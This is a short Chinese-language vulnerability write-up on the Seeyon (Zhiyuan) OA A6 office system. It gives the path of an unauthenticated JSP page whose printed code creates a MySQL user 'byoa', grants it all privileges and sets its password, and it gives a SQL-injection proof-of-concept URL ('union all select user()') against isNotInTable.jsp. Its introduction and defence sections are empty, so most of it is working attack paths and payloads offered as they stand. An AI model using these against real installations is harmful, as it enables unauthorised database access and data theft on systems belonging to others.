跳转至

致远OA A6 重置数据库账号密码漏洞

一、漏洞简介

二、漏洞影响

致远OA A6

三、复现过程

重置数据库账号密码防御

http://url/yyoa/ext/byoa/start.jsp

该文件的代码为:

<%  Connection conn = null; PreparedStatement pstmt = null; String sql = "create user byoa IDENTIFIED by 'byoa'";   try {       conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection();        pstmt = conn.prepareStatement(sql);     out.print(pstmt.executeUpdate());       sql = "grant all on *.* to byoa";       pstmt = conn.prepareStatement(sql);     out.println(pstmt.executeUpdate());     pstmt.close();      sql = "update mysql.user set password=password('byoa') where user='byoa'";      pstmt = conn.prepareStatement(sql);     out.println(pstmt.executeUpdate());     pstmt.close();      sql = "flush privileges";       pstmt = conn.prepareStatement(sql);     out.print(pstmt.executeUpdate());       pstmt.close();      //conn.close(); } catch (Exception ex) {                    out.println(ex.getMessage());   }%>

可以抛光该文件没有验证任何权限,便进行了重置数据库用户byoa的密码为:byoa

mysql + jsp注射

http://url/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp

poc

http://url/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23{'success':false,'errors':'root@localhost'}